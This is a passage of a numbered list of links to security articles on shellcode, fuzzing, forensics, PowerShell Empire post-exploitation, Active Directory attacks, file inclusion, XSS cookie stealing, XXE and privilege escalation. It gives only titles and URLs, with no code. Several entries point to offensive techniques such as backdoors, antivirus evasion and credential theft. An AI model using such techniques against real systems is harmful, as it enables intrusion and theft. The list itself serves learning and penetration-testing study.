Shellcode:\n\n\n\nhttps://azeria-labs.com/process-continuation-shellcode/\n\n\n\n\n-1476-Dynamic Shellcode Execution:\n\n\n\nhttps://www.countercept.com/blog/dynamic-shellcode-execution/\n\n\n\n-1477-Tutorials: Writing shellcode to binary files:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/7.html\n\n\n\n\n\n-1478-Creating Shellcode for an Egg Hunter :\n\n\n\nhttps://securitychops.com/2018/05/26/slae-assignment-3-egghunter-shellcode.html\n\n\n\n\n-1479-How to: Shellcode to reverse bind a shell with netcat :\n\n\n\nwww.hackerfall.com/story/shellcode-to-reverse-bind-a-shell-with-netcat\n\n\n\n-1480-Bashing the Bash — Replacing Shell Scripts with Python:\n\n\n\nhttps://medium.com/capital-one-tech/bashing-the-bash-replacing-shell-scripts-with-python-d8d201bc0989\n\n\n\n\n-1481-How to See All Devices on Your Network With nmap on Linux:\n\n\n\nhttps://www.howtogeek.com/.../how-to-see-all-devices-on-your-network-with-nmap-on-linux\n\n\n\n-1482-A Complete Guide to Nmap:\n\n\n\nhttps://www.edureka.co/blog/nmap-tutorial/\n\n\n\n\n-1483-Nmap from Beginner to Advanced :\n\n\n\nhttps://resources.infosecinstitute.com/nmap/\n\n\n\n-1484-Using Wireshark: Identifying Hosts and Users:\n\n\n\nhttps://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/\n\n\n\n\n-1485-tshark tutorial and filter examples:\n\n\n\nhttps://hackertarget.com/tshark-tutorial-and-filter-examples/\n\n\n\n-1486-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example:\n\n\n\nhttps://www.guru99.com/fuzz-testing.html\n\n\n\n\n-1487-Tutorial: Dumb Fuzzing - Peach Community Edition:\n\n\n\ncommunity.peachfuzzer.com/v3/TutorialDumbFuzzing.html\n\n\n\n\n-1488-HowTo: ExploitDev Fuzzing:\n\n\n\nhttps://hansesecure.de/2018/03/howto-exploitdev-fuzzing/\n\n\n\n\n-1489-Fuzzing with Metasploit:\n\n\n\nhttps://www.corelan.be/?s=fuzzing\n\n\n\n\n-1490-Fuzzing – how to find bugs automagically using AFL:\n\n\n\n9livesdata.com/fuzzing-how-to-find-bugs-automagically-using-afl/\n\n\n\n\n\n-1491-Introduction to File Format Fuzzing & Exploitation:\n\n\n\nhttps://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3\n\n\n\n\n-1492-0x3 Python Tutorial: Fuzzer:\n\n\n\nhttps://www.primalsecurity.net/0x3-python-tutorial-fuzzer/\n\n\n\n\n-1493-Hunting For Bugs With AFL:\n\n\n\nhttps://research.aurainfosec.io/hunting-for-bugs-101/\n\n\n\n\n-1494-Fuzzing: The New Unit Testing:\n\n\n\n\nhttps://www.slideshare.net/DmitryVyukov/fuzzing-the-new-unit-testing\n\n\n\n-1495-Fuzzing With Peach Framework:\n\n\nhttps://www.terminatio.org/fuzzing-peach-framework-full-tutorial-download/\n\n\n\n\n-1496-How we found a tcpdump vulnerability using cloud fuzzing:\n\n\n\nhttps://www.softscheck.com/en/identifying-security-vulnerabilities-with-cloud-fuzzing/\n\n\n\n\n-1497-Finding a Fuzzer: Peach Fuzzer vs. Sulley:\n\n\n\nhttps://medium.com/@jtpereyda/finding-a-fuzzer-peach-fuzzer-vs-sulley-1fcd6baebfd4\n\n\n\n\n-1498-Android malware analysis:\n\n\n\nhttps://www.slideshare.net/rossja/android-malware-analysis-71109948\n\n\n\n-1499-15+ Malware Analysis Tools & Techniques :\n\n\nhttps://www.template.net/business/tools/malware-analysis/\n\n\n\n\n-1500-30 Online Malware Analysis Sandboxes / Static Analyzers:\n\n\n\nhttps://medium.com/@su13ym4n/15-online-sandboxes-for-malware-analysis-f8885ecb8a35\n\n\n\n-1501-Linux Command Line Forensics and Intrusion Detection Cheat Sheet:\n\n\n\nhttps://www.sandflysecurity.com/blog/compromised-linux-cheat-sheet/\n\n\n\n-1502-Cheat Sheets - SANS Digital Forensics:\n\n\n\nhttps://digital-forensics.sans.org/community/cheat-sheets\n\n\n\n\n-1503-Breach detection with Linux filesystem forensics:\n\n\n\n\nhttps://opensource.com/article/18/4/linux-filesystem-forensics\n\n\n\n\n-1504-Digital Forensics Cheat Sheets Collection :\n\n\n\n\nhttps://neverendingsecurity.wordpress.com/digital-forensics-cheat-sheets-collection/\n\n\n\n\n-1505-Security Incident Survey Cheat Sheet for Server Administrators:\n\n\n\nhttps://zeltser.com/security-incident-survey-cheat-sheet/\n\n\n\n-1506-Digital forensics: A cheat sheet :\n\n\n\nhttps://www.techrepublic.com/article/digital-forensics-the-smart-persons-guide/\n\n\n\n\n-1507-Windows Registry Forensics using 'RegRipper' Command-Line on Linux:\n\n\n\nhttps://www.pinterest.cl/pin/794815034207804059/\n\n\n\n\n-1508-Windows IR Live Forensics Cheat Sheet:\n\n\n\nhttps://www.cheatography.com/koriley/cheat-sheets/windows-ir-live-forensics/\n\n\n\n\n-1509-10 Best Known Forensics Tools That Works on Linux:\n\n\n\nhttps://linoxide.com/linux-how-to/forensics-tools-linux/\n\n\n\n-1510-Top 20 Free Digital Forensic Investigation Tools for SysAdmins:\n\n\n\nhttps://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/\n\n\n\n\n-1511-Windows Volatile Memory Acquisition & Forensics 2018:\n\n\n\nhttps://medium.com/@lucideus/windows-volatile-memory-acquisition-forensics-2018-lucideus-forensics-3f297d0e5bfd\n\n\n\n\n-1512-PowerShell Cheat Sheet :\n\n\n\nhttps://www.digitalforensics.com/blog/powershell-cheat-sheet-2/\n\n\n\n\n-1513-Forensic Artifacts: evidences of program execution on Windows systems:\n\n\n\n\n\nhttps://www.andreafortuna.org/forensic-artifacts-evidences-of-program-execution-on-windows-systems\n\n\n\n-1514-How to install a CPU?:\n\n\nhttps://www.computer-hardware-explained.com/how-to-install-a-cpu.html\n\n\n\n-1515-How To Upgrade and Install a New CPU or Motherboard:\n\n\n\nhttps://www.howtogeek.com/.../how-to-upgrade-and-install-a-new-cpu-or-motherboard-or-both\n\n\n\n-1516-Installing and Troubleshooting CPUs:\n\n\n\nwww.pearsonitcertification.com/articles/article.aspx?p=1681054&seqNum=2\n\n\n\n\n\n-1517-15 FREE Pastebin Alternatives You Can Use Right Away:\n\n\n\nhttps://www.rootreport.com/pastebin-alternatives/\n\n\n\n\n-1518-Basic computer troubleshooting steps:\n\n\n\nhttps://www.computerhope.com/basic.htm\n\n\n\n\n-1519-18 Best Websites to Learn Computer Troubleshooting and Tech support:\n\n\n\nhttp://transcosmos.co.uk/best-websites-to-learn-computer-troubleshooting-and-tech-support\n\n\n\n\n\n-1520-Post Exploitation with PowerShell Empire 2.3.0 :\n\n\n\nhttps://www.yeahhub.com/post-exploitation-powershell-empire-2-3-0-detailed-tutorial/\n\n\n\n\n-1521-Windows Persistence with PowerShell Empire :\n\n\nhttps://www.hackingarticles.in/windows-persistence-with-powershell-empire/\n\n\n\n\n-1522-powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial:\n\n\n\nhttps://www.dudeworks.com/powershell-empire-tutorials-empire-to-meterpreter-shellcode-injection-ssl-tutorial\n\n\n\n\n-1523-Bypassing Anti-Virtus & Hacking Windows 10 Using Empire :\n\n\n\nhttps://zsecurity.org/bypassing-anti-virtus-hacking-windows-10-using-empire/\n\n\n\n\n-1524-Hacking with Empire – PowerShell Post-Exploitation Agent :\n\n\n\nhttps://www.prodefence.org/hacking-with-empire-powershell-post-exploitation-agent/\n\n\n\n\n-1525-Hacking Windows Active Directory Full guide:\n\n\n\nwww.kalitut.com/hacking-windows-active-directory-full.html\n\n\n\n-1526-PowerShell Empire for Post-Exploitation:\n\n\n\n\nhttps://www.hackingloops.com/powershell-empire/\n\n\n\n-1527-Generate A One-Liner – Welcome To LinuxPhilosophy!:\n\n\n\nlinuxphilosophy.com/rtfm/more/empire/generate-a-one-liner/\n\n\n\n\n-1528-CrackMapExec - Ultimate Guide:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/cme/crackmapexec/\n\n\n\n\n-1529-PowerShell Logging and Security:\n\n\n\nhttps://www.secjuice.com/enterprise-powershell-protection-logging/\n\n\n\n\n-1530-Create your own FUD Backdoors with Empire:\n\n\n\n\nhttp://blog.extremehacking.org/blog/2016/08/25/create-fud-backdoors-empire/\n\n\n\n\n-1531-PowerShell Empire Complete Tutorial For Beginners:\n\n\n\nhttps://video.hacking.reviews/2019/06/powershell-empire-complete-tutorial-for.html\n\n\n\n\n-1532-Bash Bunny: Windows Remote Shell using Metasploit & PowerShell:\n\n\n\nhttps://cyberarms.wordpress.com/.../bash-bunny-windows-remote-shell-using-metasploit-powershell\n\n\n\n-1533-Kerberoasting - Stealing Service Account Credentials:\n\n\n\nhttps://www.scip.ch/en/?labs.20181011\n\n\n\n\n-1534-Automating Mimikatz with Empire and DeathStar :\n\n\n\nhttps://blog.stealthbits.com/automating-mimikatz-with-empire-and-deathstar/\n\n\n\n\n-1535-Windows oneliners to get shell :\n\n\n\n\nhttps://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/\n\n\n\n\n-1536-ObfuscatedEmpire :\n\n\n\nhttps://cobbr.io/ObfuscatedEmpire.html\n\n\n\n\n-1537-Pentesting with PowerShell in six steps:\n\n\n\nhttps://periciacomputacional.com/pentesting-with-powershell-in-six-steps/\n\n\n\n\n-1538-Using Credentials to Own Windows Boxes - Part 3 (WMI and WinRM):\n\n\n\nhttps://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm\n\n\n\n\n-1539-PowerShell Security Best Practices:\n\n\n\nhttps://www.digitalshadows.com/blog-and-research/powershell-security-best-practices/\n\n\n\n\n-1540-You can detect PowerShell attacks:\n\n\n\nhttps://www.slideshare.net/Hackerhurricane/you-can-detect-powershell-attacks\n\n\n\n\n-1541-Detecting and Preventing PowerShell Attacks:\n\n\n\n\nhttps://www.eventsentry.com/.../powershell-pw3rh311-detecting-preventing-powershell-attacks\n\n\n\n\n-1542-Detecting Offensive PowerShell Attack Tools – Active Directory Security:\n\n\n\nhttps://adsecurity.org/?p=2604\n\n\n\n\n-1543-An Internal Pentest Audit Against Active Directory:\n\n\n\nhttps://www.exploit-db.com/docs/46019\n\n\n\n\n-1544-A complete Active Directory Penetration Testing Checklist :\n\n\n\n\nhttps://gbhackers.com/active-directory-penetration-testing-checklist/\n\n\n\n\n-1545-Active Directory | Penetration Testing Lab:\n\n\n\nhttps://pentestlab.blog/tag/active-directory/\n\n\n\n\n-1546-Building and Attacking an Active Directory lab with PowerShell :\n\n\n\n\nhttps://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell\n\n\n\n\n-1547-Penetration Testing in Windows Server Active Directory using Metasploit:\n\n\n\nhttps://www.hackingarticles.in/penetration-testing-windows-server-active-directory-using-metasploit-part-1\n\n\n\n\n-1548-Red Team Penetration Testing – Going All the Way (Part 2 of 3) :\n\n\n\nhttps://www.anitian.com/red-team-testing-going-all-the-way-part2/\n\n\n\n\n-1549-Penetration Testing Active Directory, Part II:\n\n\n\nhttps://www.jishuwen.com/d/2Mtq\n\n\n\n\n-1550-Gaining Domain Admin from Outside Active Directory:\n\n\n\n\nhttps://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html\n\n\n\n\n-1551-Post Exploitation Cheat Sheet:\n\n\n\nhttps://0xsecurity.com/blog/some-hacking-techniques/post-exploitation-cheat-sheet\n\n\n\n\n-1552-Windows post-exploitation :\n\n\n\n\nhttps://github.com/emilyanncr/Windows-Post-Exploitation\n\n\n\n\n-1553-OSCP - Windows Post Exploitation :\n\n\n\n\nhttps://hackingandsecurity.blogspot.com/2017/9/oscp-windows-post-exploitation.html\n\n\n\n\n-1554-Windows Post-Exploitation Command List:\n\n\n\nhttp://pentest.tonyng.net/windows-post-exploitation-command-list/\n\n\n\n\n-1555-Windows Post-Exploitation Command List:\n\n\n\n\nhttp://tim3warri0r.blogspot.com/2012/09/windows-post-exploitation-command-list.html\n\n\n\n\n-1556-Linux Post-Exploitation · OSCP - Useful Resources:\n\n\n\n\nhttps://backdoorshell.gitbooks.io/oscp-useful-links/content/linux-post-exploitation.html\n\n\n\n\n-1557-Pentesting Cheatsheet:\n\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n\n\n-1558-Pentesting Cheatsheets - Red Teaming Experiments:\n\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets\n\n\n\n\n-1559-OSCP Goldmine:\n\n\n\nhttp://0xc0ffee.io/blog/OSCP-Goldmine\n\n\n\n\n-1560-Linux Post Exploitation Cheat Sheet:\n\n\n\nhttp://red-orbita.com/?p=8455\n\n\n\n\n-1562-OSCP useful resources and tools:\n\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n\n\n-1563-Windows Post-Exploitation Command List :\n\n\n\n\nhttps://es.scribd.com/document/100182787/Windows-Post-Exploitation-Command-List\n\n\n\n\n-1564-Metasploit Cheat Sheet:\n\n\n\nhttps://pentesttools.net/metasploit-cheat-sheet/\n\n\n\n\n-1565-Windows Privilege Escalation:\n\n\n\nhttps://awansec.com/windows-priv-esc.html\n\n\n\n\n-1566-Linux Unix Bsd Post Exploitation:\n\n\n\nhttps://attackerkb.com/Unix/LinuxUnixBSD_Post_Exploitation\n\n\n\n\n-1567-Privilege Escalation & Post-Exploitation:\n\n\n\nhttps://movaxbx.ru/2018/09/16/privilege-escalation-post-exploitation/\n\n\n\n\n-1568-Metasploit Cheat Sheet:\n\n\n\nhttps://vk-intel.org/2016/12/28/metasploit-cheat-sheet/\n\n\n\n\n-1569-Metasploit Cheat Sheet :\n\n\n\nhttps://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/\n\n\n\n\n-1570-Privilege escalation: Linux:\n\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux\n\n\n\n\n-1571-Cheat Sheets — Amethyst Security:\n\n\n\n\nhttps://www.ssddcyber.com/cheatsheets\n\n\n\n\n-1572-Responder - CheatSheet:\n\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1573-Cheatsheets:\n\n\n\nhttps://h4ck.co/wp-content/uploads/2018/06/cheatsheet.txt\n\n\n\n\n-1574-Are you ready for OSCP?:\n\n\n\nhttps://www.hacktoday.io/t/are-you-ready-for-oscp/59\n\n\n\n\n-1575-Windows Privilege Escalation:\n\n\n\nhttps://labs.p64cyber.com/windows-privilege-escalation/\n\n\n\n\n-1576-A guide to Linux Privilege Escalation:\n\n\n\nhttps://payatu.com/guide-linux-privilege-escalation/\n\n\n\n\n-1577-Windows Post-Exploitation-Cheat-Sheet:\n\n\n\n\nhttp://pentestpanther.com/2019/07/01/windows-post-exploitation-cheat-sheet/\n\n\n\n-1578-Windows Privilege Escalation (privesc) Resources:\n\n\n\nhttps://www.willchatham.com/security/windows-privilege-escalation-privesc-resources/\n\n\n\n-1579-Dissecting Mobile Malware:\n\n\n\nhttps://slideplayer.com/slide/3434519/\n\n\n\n\n-1580-Android malware analysis with Radare: Dissecting the Triada Trojan:\n\n\n\n\nwww.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triad/\n\n\n\n\n-1581-Dissecting Mobile Native Code Packers:\n\n\n\nhttps://blog.zimperium.com/dissecting-mobile-native-code-packers-case-study/\n\n\n\n\n-1582-What is Mobile Malware? Defined, Explained, and Explored:\n\n\n\nhttps://www.forcepoint.com/cyber-edu/mobile-malware\n\n\n\n\n-1583-Malware Development — Professionalization of an Ancient Art:\n\n\n\nhttps://medium.com/scip/malware-development-professionalization-of-an-ancient-art-4dfb3f10f34b\n\n\n\n\n-1584-Weaponizing Malware Code Sharing with Cythereal MAGIC:\n\n\n\nhttps://medium.com/@arun_73782/cythereal-magic-e68b0c943b1d\n\n\n\n\n-1585-Web App Pentest Cheat Sheet:\n\n\n\nhttps://medium.com/@muratkaraoz/web-app-pentest-cheat-sheet-c17394af773\n\n\n\n\n-1586-The USB Threat is [Still] Real — Pentest Tools for Sysadmins, Continued:\n\n\n\nhttps://medium.com/@jeremy.trinka/the-usb-threat-is-still-real-pentest-tools-for-sysadmins-continued-88560af447bf\n\n\n\n\n-1587-How to Run An External Pentest:\n\n\n\nhttps://medium.com/@_jayhill/how-to-run-an-external-pentest-dd76ed14bb6a\n\n\n\n\n-1588-Advice for new pentesters:\n\n\n\nhttps://medium.com/@PentesterLab/advice-for-new-pentesters-a5f7d75a3aea\n\n\n\n\n-1589-NodeJS Application Pentest Tips:\n\n\n\nhttps://medium.com/bugbountywriteup/nodejs-application-pentest-tips-improper-uri-handling-in-express-390b3a07cb3e\n\n\n\n\n-1590-How to combine Pentesting with Automation to improve your security:\n\n\n\nhttps://medium.com/how-to-combine-pentest-with-automation-to-improve-your-security\n\n\n\n-1591-Day 79: FTP Pentest Guide:\n\n\n\nhttps://medium.com/@int0x33/day-79-ftp-pentest-guide-5106967bd50a\n\n\n\n\n-1592-SigintOS: A Wireless Pentest Distro Review:\n\n\n\nhttps://medium.com/@tomac/sigintos-a-wireless-pentest-distro-review-a7ea93ee8f8b\n\n\n\n\n-1593-Conducting an IoT Pentest :\n\n\n\nhttps://medium.com/p/6fa573ac6668?source=user_profile...\n\n\n\n\n-1594-Efficient way to pentest Android Chat Applications:\n\n\n\nhttps://medium.com/android-tamer/efficient-way-to-pentest-android-chat-applications-46221d8a040f\n\n\n\n\n-1595-APT2 - Automated PenTest Toolkit :\n\n\n\nhttps://medium.com/media/f1cf43d92a17d5c4c6e2e572133bfeed/href\n\n\n\n-1596-Pentest Tools and Distros:\n\n\n\nhttps://medium.com/hacker-toolbelt/pentest-tools-and-distros-9d738d83f82d\n\n\n\n\n-1597-Keeping notes during a pentest/security assessment/code review:\n\n\n\nhttps://blog.pentesterlab.com/keeping-notes-during-a-pentest-security-assessment-code-review-7e6db8091a66?gi=4c290731e24b\n\n\n\n\n-1598-An intro to pentesting an Android phone:\n\n\n\nhttps://medium.com/@tnvo/an-intro-to-pentesting-an-android-phone-464ec4860f39\n\n\n\n-1599-The Penetration Testing Report:\n\n\n\nhttps://medium.com/@mtrdesign/the-penetration-testing-report-38a0a0b25cf2\n\n\n\n-1600-VA vs Pentest:\n\n\n\nhttps://medium.com/@play.threepetsirikul/va-vs-pentest-cybersecurity-2a17250d5e03\n\n\n\n-1601-Pentest: Hacking WPA2 WiFi using Aircrack on Kali Linux:\n\n\n\nhttps://medium.com/@digitalmunition/pentest-hacking-wpa2-wifi-using-aircrack-on-kali-linux-99519fee946f\n\n\n\n-1602-Pentesting Ethereum dApps:\n\n\n\nhttps://medium.com/@brandonarvanaghi/pentesting-ethereum-dapps-2a84c8dfee19\n\n\n\n\n-1603-Android pentest lab in a nutshell :\n\n\n\n\nhttps://medium.com/@dortz/android-pentest-lab-in-a-nutshell-ee60be8638d3\n\n\n\n-1604-Pentest Magazine: Web Scraping with Python :\n\n\n\nhttps://medium.com/@heavenraiza/web-scraping-with-python-170145fd90d3\n\n\n\n-1605-Pentesting iOS apps without jailbreak:\n\n\n\nhttps://medium.com/securing/pentesting-ios-apps-without-jailbreak-91809d23f64e\n\n\n\n\n-1606-OSCP/Pen Testing Resources:\n\n\n\n\nhttps://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45\n\n\n\n\n-1607-Web Application Security & Bug Bounty (Methodology, Reconnaissance, Vulnerabilities, Reporting):\n\n\n\nhttps://blog.usejournal.com/web-application-security-bug-bounty-methodology-reconnaissance-vulnerabilities-reporting-635073cddcf2?gi=4a578db171dc\n\n\n\n-1608-Local File Inclusion (LFI) — Web Application Penetration Testing:\n\n\n\nhttps://medium.com/@Aptive/local-file-inclusion-lfi-web-application-penetration-testing-cc9dc8dd3601\n\n\n\n-1609-Local File Inclusion (Basic):\n\n\nhttps://medium.com/@kamransaifullah786/local-file-inclusion-basic-242669a7af3\n\n\n\n-1610-PHP File Inclusion Vulnerability:\n\n\n\nhttps://www.immuniweb.com/vulnerability/php-file-inclusion.html\n\n\n\n\n-1611-Local File Inclusion:\n\n\n\n\nhttps://teambi0s.gitlab.io/bi0s-wiki/web/lfi/\n\n\n\n\n-1612-Web Application Penetration Testing: Local File Inclusion:\n\n\n\nhttps://hakin9.org/web-application-penetration-testing-local-file-inclusion-lfi-testing/\n\n\n\n\n-1613-From Local File Inclusion to Code Execution :\n\n\n\nhttps://resources.infosecinstitute.com/local-file-inclusion-code-execution/\n\n\n\n\n-1614-RFI / LFI:\n\n\n\nhttps://security.radware.com/ddos-knowledge-center/DDoSPedia/rfi-lfi/\n\n\n\n\n-1615-From Local File Inclusion to Remote Code Execution - Part 2:\n\n\n\nhttps://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2\n\n\n\n\n-1616-Local File Inclusion:\n\n\n\nhttps://xapax.gitbooks.io/security/content/local_file_inclusion.html\n\n\n\n-1617-Beginner Guide to File Inclusion Attack (LFI/RFI) :\n\n\n\nhttps://www.hackingarticles.in/beginner-guide-file-inclusion-attack-lfirfi/\n\n\n\n\n-1618-LFI / RFI:\n\n\n\nhttps://secf00tprint.github.io/blog/payload-tester/lfirfi/en\n\n\n\n\n-1619-LFI and RFI Attacks - All You Need to Know:\n\n\n\n\nhttps://www.getastra.com/blog/your-guide-to-defending-against-lfi-and-rfi-attacks/\n\n\n\n\n-1620-Log Poisoning - LFI to RCE :\n\n\n\nhttp://liberty-shell.com/sec/2018/05/19/poisoning/\n\n\n\n-1621-LFI:\n\n\n\nhttps://www.slideshare.net/cyber-punk/lfi-63050678\n\n\n\n\n-1622-Hand Guide To Local File Inclusion(LFI):\n\n\n\nwww.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html\n\n\n\n\n-1623-Local File Inclusion (LFI) - Cheat Sheet:\n\n\n\nhttps://ironhackers.es/herramientas/lfi-cheat-sheet/\n\n\n\n\n-1624-Web Application Penetration Testing Local File Inclusion (LFI):\n\n\n\n\nhttps://www.cnblogs.com/Primzahl/p/6258149.html\n\n\n\n\n-1625-File Inclusion Vulnerability Prevention:\n\n\n\n\nhttps://www.pivotpointsecurity.com/blog/file-inclusion-vulnerabilities/\n\n\n\n\n-1626-The Most In-depth Hacker's Guide:\n\n\n\nhttps://books.google.com/books?isbn=1329727681\n\n\n\n\n-1627-Hacking Essentials: The Beginner's Guide To Ethical Hacking:\n\n\n\n\nhttps://books.google.com/books?id=e6CHDwAAQBAJ\n\n\n\n\n-1628-Web App Hacking, Part 11: Local File Inclusion:\n\n\n\nhttps://www.hackers-arise.com/.../Web-App-Hacking-Part-11-Local-File-Inclusion-LFI\n\n\n\n\n-1629-Local and remote file inclusion :\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi\n\n\n\n\n\n-1630-Upgrade from LFI to RCE via PHP Sessions :\n\n\n\nhttps://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/\n\n\n\n\n-1631-CVV #1: Local File Inclusion:\n\n\n\nhttps://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a\n\n\n\n\n-1632-(PDF) Cross Site Scripting (XSS) in Action:\n\n\n\n\n\nhttps://www.researchgate.net/publication/241757130_Cross_Site_Scripting_XSS_in_Action\n\n\n\n\n\n-1633-XSS exploitation part 1:\n\n\n\nwww.securityidiots.com/Web-Pentest/XSS/xss-exploitation-series-part-1.html\n\n\n\n\n\n-1634-Weaponizing self-xss:\n\n\n\n\nhttps://silentbreaksecurity.com/weaponizing-self-xss/\n\n\n\n\n-1635-Cookie Tracking and Stealing using Cross-Site Scripting:\n\n\n\n\nhttps://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/\n\n\n\n\n-1636-Defense against the Black Arts:\n\n\n\nhttps://books.google.com/books?isbn=1439821224\n\n\n\n\n-1637-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens:\n\n\n\n\nhttps://www.acunetix.com/websitesecurity/csrf-attacks/\n\n\n\n\n\n-1638-Bypassing CSRF protection:\n\n\n\n\nhttps://www.bugbountynotes.com/training/tutorial?id=5\n\n\n\n\n-1639-Stealing CSRF tokens with XSS:\n\n\n\nhttps://digi.ninja/blog/xss_steal_csrf_token.php\n\n\n\n\n-1640-Same Origin Policy and ways to Bypass:\n\n\n\n\nhttps://medium.com/@minosagap/same-origin-policy-and-ways-to-bypass-250effdc4a12\n\n\n\n\n-1641-Bypassing Same Origin Policy :\n\n\n\nhttps://resources.infosecinstitute.com/bypassing-same-origin-policy-sop/\n\n\n\n-1642-Client-Side Attack - an overview :\n\n\n\n\nhttps://www.sciencedirect.com/topics/computer-science/client-side-attack\n\n\n\n\n-1643-Client-Side Injection Attacks:\n\n\n\nhttps://blog.alertlogic.com/blog/client-side-injection-attacks/\n\n\n\n\n-1645-The Client-Side Battle Against JavaScript Attacks Is Already Here:\n\n\n\n\nhttps://medium.com/swlh/the-client-side-battle-against-javascript-attacks-is-already-here-656f3602c1f2\n\n\n\n\n\n-1646-Why Let’s Encrypt is a really, really, really bad idea:\n\n\n\n\nhttps://medium.com/swlh/why-lets-encrypt-is-a-really-really-really-bad-idea-d69308887801\n\n\n\n\n\n-1647-Huge Guide to Client-Side Attacks:\n\n\n\n\nhttps://www.notion.so/d382649cfebd4c5da202677b6cad1d40\n\n\n\n\n-1648-OSCP Prep – Episode 11: Client Side Attacks:\n\n\n\n\nhttps://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/\n\n\n\n\n\n-1649-Client side attack - AV Evasion:\n\n\n\n\n\nhttps://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack\n\n\n\n\n-1650-Client-Side Attack With Metasploit (Part 4):\n\n\n\n\nhttps://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/\n\n\n\n\n\n-1651-Ransomware: Latest Developments and How to Defend Against Them:\n\n\n\n\nhttps://www.recordedfuture.com/latest-ransomware-attacks/\n\n\n\n-1652-Cookie Tracking and Stealing using Cross-Site Scripting:\n\n\n\nhttps://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/\n\n\n\n\n-1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords:\n\n\n\nhttps://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833\n\n\n\n-1654-How I was able to steal cookies via stored XSS in one of the famous e-commerce site:\n\n\n\n\nhttps://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d\n\n\n\n\n-1655-Steal victim's cookie using Cross Site Scripting (XSS) :\n\n\n\n\nhttps://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/\n\n\n\n\n-1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security:\n\n\n\n\nhttps://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86\n\n\n\n\n-1657-Remote Command Execution:\n\n\n\nhttps://hacksland.net/remote-command-execution/\n\n\n\n\n-1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough:\n\n\n\n\nhttps://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2\n\n\n\n\n-1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit):\n\n\n\n\nhttps://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/\n\n\n\n\n-1660-XXE - ZeroSec - Adventures In Information Security:\n\n\n\n\nhttps://blog.zsec.uk/out-of-band-xxe-2/\n\n\n\n\n-1661-Exploitation: XML External Entity (XXE) Injection:\n\n\n\n\nhttps://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection\n\n\n\n\n-1662-Hack The Box: DevOops:\n\n\n\n\nhttps://redteamtutorials.com/2018/11/11/hack-the-box-devoops/\n\n\n\n\n-1663-Web Application Penetration Testing Notes:\n\n\n\n\nhttps://techvomit.net/web-application-penetration-testing-notes/\n\n\n\n\n-1664-WriteUp – Aragog (HackTheBox) :\n\n\n\n\nhttps://ironhackers.es/en/writeups/writeup-aragog-hackthebox/\n\n\n\n\n-1665-Linux Privilege Escalation Using PATH Variable:\n\n\n\nhttps://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/\n\n\n\n\n-1666-Linux Privilege Escalation via Automated Script :\n\n\n\nhttps://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/\n\n\n\n\n-1667-Privilege Escalation - Linux :\n\n\n\nhttps://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html\n\n\n\n-1668-Linux Privilege Escalation:\n\n\n\nhttps://percussiveelbow.github.io/linux-privesc/\n\n\n\n-1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit :\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/\n\n\n\n\n-1670-Linux Privilege Escalation With Kernel Exploit:\n\n\n\nhttps://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/\n\n\n\n-1671-Reach the root! How to gain privileges in Linux:\n\n\n\nhttps://hackmag.com/security/reach-the-root/\n\n\n\n-1672-Enumeration for Linux Privilege Escalation:\n\n\n\nhttps://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959\n\n\n\n\n-1673-Linux Privilege Escalation Scripts :\n\n\n\n\nhttps://netsec.ws/?p=309\n\n\n\n-1674-Understanding Privilege Escalation:\n\n\n\nwww.admin-magazine.com/Articles/Understanding-Privilege-Escalation\n\n\n\n\n\n-1675-Toppo:1 | Vulnhub 